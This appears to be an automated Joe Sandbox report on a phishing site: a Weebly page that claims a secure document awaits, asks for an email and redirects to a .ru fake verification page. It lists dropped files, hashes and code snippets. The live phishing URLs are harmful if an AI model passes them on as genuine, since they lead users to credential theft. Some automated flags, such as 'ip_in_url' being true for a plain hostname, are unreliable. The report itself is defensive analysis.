URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "HAI RICEVUTO UN DOCUMENTO SICURO", "prominent_button_name": "DOWNLOAD", "text_input_field_labels": [ "EMAIL *" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "HAI RICEVUTO UN DOCUMENTO SICURO", "prominent_button_name": "DOWNLOAD", "text_input_field_labels": [ "EMAIL *" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	{ "brands": [ "Nissan" ] }
	{ "brands": [ "Nissan" ] }
URL: https://cdn2.editmysite.com/js/site/main-customer-... Model: Joe Sandbox AI	```json { "risk_score": 2, "reasoning": "The script primarily involves module loading and utility functions for handling cookies and jQuery. It uses a CDN for script loading, which is a common practice, and there are no high-risk indicators like dynamic code execution or data exfiltration. The use of cookies is standard for session management. The script interacts with a known domain (editmysite.com), which is typically associated with website building services, reducing the risk score. However, it does involve external data transmission to a CDN, which is a moderate-risk indicator." }
(function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={exports:{},id:r,loaded:false};e[r].call(i.exports,i,i.exports,n);i.loaded=true;return i.exports}n.m=e;n.c=t;n.p="https://cdn2.editmysite.com/js/";n.p="https://"+window.ASSETS_BASE+"/js/"\|\|n.p;return n(0)})([function(e,t,n){e.exports=n(321)},function(e,t,n){var r;!(r=function(){if(window.Weebly!==undefined&&window.Weebly.jQuery!==undefined){return window.Weebly.jQuery}return window.jQuery}.call(t,n,t,e),r!==undefined&&(e.exports=r))},function(e,t,n){var r,i;!(r=[n(1)],i=function(e){window.Weebly=window._W=window._W\|\|{};window._W.utl=window._W.utl\|\|function(e){window._W.failedTls=window._W.failedTls\|\|[];window._W.failedTls.push(e);return e};window._W.ftl=window._W.ftl\|\|function(e){window._W.failedFtls=window._W.failedFtls\|\|[];window._W.failedFtls.push(e);return""};window._W.utl=window._W.utl\|\|function(e){window._W.failedUtls=window._W.failedUtls\|\|[];window._W.failedUtls.push(e);return""};window._W.stl=window._W.stl\|\|function(e){window._W.failedStls=window._W.failedStls\|\|[];window._W.failedStls.push(e);return""};window._W.setCookie=function(e,t,n){var r=new Date;r.setTime(r.getTime()+n2460601e3);var i="expires="+r.toUTCString();document.cookie=e+"="+t+"; "+i};window._W.clearCookie=function(e){window._W.setCookie(e,"",-1)};window._W.getCookie=function(e){var t=e+"=";var n=document.cookie.split(";");for(var r=0;r<n.length;r++){var i=n[r];while(i.charAt(0)==" ")i=i.substring(1);if(i.indexOf(t)==0)return i.substring(t.length,i.length)}return""};window._W.jQuery=e;window._W.RECAPTCHA_PUBLIC_KEY=window["RECAPTCHA_PUBLIC_KEY"]="6Lf4O9USAAAAAOSa9cF4SEtxBcjrwrLe1_yP00ke";window._W.INVISIBLE_RECAPTCHA_PUBLIC_KEY=window["INVISIBLE_RECAPTCHA_PUBLIC_KEY"]="6LfRSRsUAAAAAKZnbFLRh9pFqexMBpUkku4TAYM7";return window._W}.apply(t,r),i!==undefined&&(e.exports=i))},function(e,t,n){(function(t){e.exports=t["_"]=n(34)}).call(t,function(){return this}())},function(e,t,n){var r=n(9);var i=n(36);var a=n(24);var o=n(25);var s=n(37);var u="prototype";var c=function(e,t,n){var f=e&c.F;var l=e&c.G;var v=e&c.S;var d=e&c.P;var p=e&c.B;var h=l?r:v?r[t]\|\|(r[t]={}):(r[t]\|\|{})[u];var g=l?i:i[t]\|\|(i[t]={});var m=g[u]\|\|(g[u]={});var y,_,b,w;if(l)n=t;for(y in n){_=!f&&h&&h[y]!==undefined;b=(_?h:n)[y];w=p&&_?s(b,r):d&&typeof b=="function"?s(Function.call,b):b;if(h)o(h,y,b,e&c.U);if(g[y]!=b)a(g,y,w);if(d&&m[y]!=b)m[y]=b}};r.core=i;c.F=1;c.G=2;c.S=4;c.P=8;c.B=16;c.W=32;c.U=64;c.R=128;e.exports=c},function(e,t,n){var r,i;(function(a,o){if(true){!(r=[n(3),n(1),t],i=function(e,t,n){a.Backbone=o(a,n,e,t)}.apply(t,r),i!==undefined&&(e.exports=i))}else if(typeof t!=="undefined"){var s=require("underscore");o(a,t,s)}else{a.Backbone=o(a,{},a._,a.jQuery\|\|a.Zepto\|\|a.ender\|\|a.$)}})(this,function(e,t,n,r){var i=e.Backbone;var a=[];var o=a.push;var s=a.slice;var u=a.splice;t.VERSION="1.1.2";t.$=r;t.noConflict=function(){e.Backbone=i;return this};t.emulateHTTP=false;t.emulateJSON=false;var c=t.Events={on:function(e,t,n){if(!l(this,"on",e,[t,n])\|\|!t)return this;this._events\|\|(this._events={});var r=this._events[e]\|\|(this._events[e]=[]);r.push({callback:t,context:n,ctx:n\|\|this});return this},once:function(e,t,r){if(!l(this,"once",e,[t,r])\|\|!t)return this;var i=this;var a=n.once(function(){i.off(e,a);t.apply(this,arguments)});a._callback=t;return this.on(e,a,r)},off:function(e,t,r){var i,a,o,s,u,c,f,v;if(!this._events\|\|!l(this,"off",e,[t,r]))return this;if(!e&&!t&&!r){this._events=void 0;return this}s=e?[e]:n.keys(this._events);for(u=0,c=s.length;u<c;u++){e=s[u];if(o=this._events[e]){this._events[e]=i=[];if(t\|\|r){for(f=0,v=o.length;f<v;f++){a=o[f];if(t&&t!==a.callback&&t!==a.callback._callback\|\|r&&r!==a.context){i.push(a)}}}if(!i.length)delete this._events[e]}}return this},trigger:function(e){if(!this._events)return this;var t=s.call(arguments,1);if(!l(this,"trigger",e,t))return this;var n=this._events[e];var r=this._events.all;if(n)v(n,t);if(r)v(r,arguments);return this},stopListening:function(e,t,r){var i=this._
URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	{ "brands": [ "Nissan" ] }
	{ "brands": [ "Nissan" ] }
URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	```json{ "legit_domain": "nissan.com", "classification": "wellknown", "reasons": [ "The brand 'Nissan' is a well-known automotive manufacturer.", "The URL 'simatantincendi.weebly.com' does not match the legitimate domain 'nissan.com'.", "The domain 'weebly.com' is a platform for creating websites, which can be used by anyone, increasing the risk of phishing.", "The subdomain 'simatantincendi' does not have any apparent connection to Nissan, which is suspicious.", "The presence of a generic email input field without any specific context or branding increases suspicion." ], "riskscore": 9} Google indexed: False
URL: simatantincendi.weebly.com Brands: Nissan Input Fields: EMAIL *
URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	```json{ "legit_domain": "nissan.com", "classification": "wellknown", "reasons": [ "The brand 'Nissan' is a well-known automotive manufacturer.", "The URL 'simatantincendi.weebly.com' does not match the legitimate domain 'nissan.com'.", "The use of 'weebly.com', a website builder platform, suggests this is a personal or small business site, not an official Nissan site.", "The subdomain 'simatantincendi' is unrelated to Nissan and is suspicious.", "The presence of an email input field could be used for phishing purposes." ], "riskscore": 9} Google indexed: False
URL: simatantincendi.weebly.com Brands: Nissan Input Fields: EMAIL *
URL: https://684.termlicari.ru/HnkNbg/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Ensuring your safety with browser verification", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://684.termlicari.ru Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": true, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://684.termlicari.ru
URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "HAI RICEVUTO UN DOCUMENTO SICURO", "prominent_button_name": "DOWNLOAD", "text_input_field_labels": [ "EMAIL *" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://684.termlicari.ru/HnkNbg/ Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://simatantincendi.weebly.com/ Model: Joe Sandbox AI	{ "brands": [ "Nissan" ] }
	{ "brands": [ "Nissan" ] }
URL: https://684.termlicari.ru/HnkNbg/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Ensuring your safety with browser verification.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://684.termlicari.ru/HnkNbg/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://684.termlicari.ru/HnkNbg/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Ensuring your safety with browser verification.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://684.termlicari.ru/HnkNbg/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }
	{ "brands": [ "Cloudflare" ] }
URL: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your current User-Agent string appears to be from an automated process, if this is incorrect, please click this link:", "prominent_button_name": "United States English Microsoft Homepage", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://www.microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://www.microsoft.com
URL: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 12:56:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.981451276676618
Encrypted:	false
SSDEEP:
MD5:	A7ED8A31D74141B9359E1CB8C4907A04
SHA1:	655D6C483CA7B36E1CDF34FA7217359355B3628C
SHA-256:	0DF9D173C54D056B16B78BD7D0D700CA7E94A3876543B43626B85E8909BE9157
SHA-512:	B56C585387B6DB87535E29F7823A87240914ACA103624471BBB08708108E08DEA3115D0D79681CDD9EA493BE343CAE0CF11303F96AA4D4DE7CFDDA855DB99196
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....).C.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.n....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............(>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 12:56:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.998933130020341
Encrypted:	false
SSDEEP:
MD5:	992F8CC4C66AAF37C7A9FCA73C28CDBB
SHA1:	CE21C1A6EA4DA5ACFEB5A4C6E4976EA40BC92716
SHA-256:	E76C223B8DD25362B07CAD6333C7095558A05C13D5101DC1FA057B7DDE9E8350
SHA-512:	8A0B061A8B999973B793B690603FA919B26E05BC903F41B7ACF7F2FFAB1880C919FA0BFA9FB3FF2239C64C0FABAE31B60CE3D3B5EF880FDEAC364367AF301016
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....[X.C.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.n....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............(>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.00599223219236
Encrypted:	false
SSDEEP:
MD5:	403B117FB361A61B1564F77C8468B5B7
SHA1:	32E950F400BA29ABAE9D0119901B75BA1E56BA25
SHA-256:	80B09C08EA63AB82C771243B4AB7AE43424C7468E83CAED0EBA8FCC8FC93DD51
SHA-512:	985D11DC4C5227D3211FAEF4BBC49BE7295338CA9A652D1A20A215F9D4EF839F52223791800653D292396B46B24DC0C1A6B24D0FC4460CD5925F22E12156B40B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.n....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............(>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 12:56:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.994910920125068
Encrypted:	false
SSDEEP:
MD5:	60B2CDEB1F73BC9D6BD4E416FAA5CA26
SHA1:	E5BFC3ECED562D62F38AF7A5F096F29AC2E4DDE9
SHA-256:	1B046B8EF9A11C5D42E1A191CC6BCB6A261A5BABC164C28AFE96C785783F9EB2
SHA-512:	EF2D859FEB57AA9BD8E08AA2D56E3C78E410B8A4D61FA7F6CFA27ABD77050759EC0CDB5216A5DDE4D21D5C397958AF1CD8A38985B0AADF0109C56588EF3A3DFF
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....M,.C.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.n....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............(>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 12:56:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9847555350212693
Encrypted:	false
SSDEEP:
MD5:	78AAB46CFA7BC3A014840A94B1705EA7
SHA1:	262D6215E7097C61EDA0F5E6061A5D32BBEF27C2
SHA-256:	5D61DB9F6679F1F02D259CECA7719590EA64185CD1F4A8034869197837093C8B
SHA-512:	74F19283FA84A35EDC62AF8D826793831DED5550DAE30F6C8B7F7B868F3DAE33E1CFF947E4CC0A5589D1B9064848ECD4E1E37E35187E9062150A9C63A7B04C77
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......C.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.n....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............(>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 12:56:11 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.992825669414057
Encrypted:	false
SSDEEP:
MD5:	CB198185245793EFDFE5EF1A940587C5
SHA1:	723513B0086D4E8908505CABBAA0FE92899502F2
SHA-256:	9AD1FB19F5A02E0CCF0C187F19DD0BA8D56FE86857754F9181A58A917BF36DA3
SHA-512:	DAD2E7384221DA0F16B7917894D9D569EED6FA27D51C97A7D4E4B0F464D1F6B19BD0579A99EE04C58B6F5EEDA47C15EE18198CFA74D0ED7AC2B5A0FC881CFA23
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......vC.O..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.n....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.o....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.o....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.o..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.o...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............(>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (48316), with no line terminators
Category:	dropped
Size (bytes):	48316
Entropy (8bit):	5.6346993394709
Encrypted:	false
SSDEEP:
MD5:	2CA03AD87885AB983541092B87ADB299
SHA1:	1A17F60BF776A8C468A185C1E8E985C41A50DC27
SHA-256:	8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
SHA-512:	13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
Malicious:	false
Reputation:	unknown
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create\|\|function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init\|\|(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4054
Entropy (8bit):	7.797012573497454
Encrypted:	false
SSDEEP:
MD5:	9F14C20150A003D7CE4DE57C298F0FBA
SHA1:	DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
SHA-256:	112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
SHA-512:	D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (446)
Category:	downloaded
Size (bytes):	469
Entropy (8bit):	5.275270252808128
Encrypted:	false
SSDEEP:
MD5:	F77981C756115880FD8DCBBD649432ED
SHA1:	CA7FC8119FF98A1F7B0D7BB0C35D8073CB4EC897
SHA-256:	775EF5E4E63F982F6E6816CF77BC5F37F75E932FEAD3244A50B7962D004B8677
SHA-512:	7B50DFFFEDF25D78A6773284D08B215BF2ECFDB1B92B5B222CC38ECD037B985A47918F5D23BA825A5AFB41F3C95C7CDBEE9563022F5A990FEB6194E3337B098C
Malicious:	false
Reputation:	unknown
URL:	https://simatantincendi.weebly.com/ajax/apps/formSubmitAjax.php
Preview:	<!DOCTYPE html>.<html>.<head><meta name="format-detection" content="telephone=no"><script type="text/javascript">function ret(){parent.postMessage && parent.postMessage(document.getElementById('response').childNodes[0].nodeValue,'https://simatantincendi.weebly.com');}</script></head><body onload='ret()'><div id='response'>{"success":true,"action":"redirect","data":{"location":"https:\/\/684.termlicari.ru\/HnkNbg\/","ucfid":"811159407606351769"}}</div></body></html>

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 12848, version 1.0
Category:	downloaded
Size (bytes):	12848
Entropy (8bit):	7.986262228528304
Encrypted:	false
SSDEEP:
MD5:	F0B3206D02A2F684530117CE1D7E8CE0
SHA1:	F3708B707B65E241B0F1C819D5F7BF7DA8412653
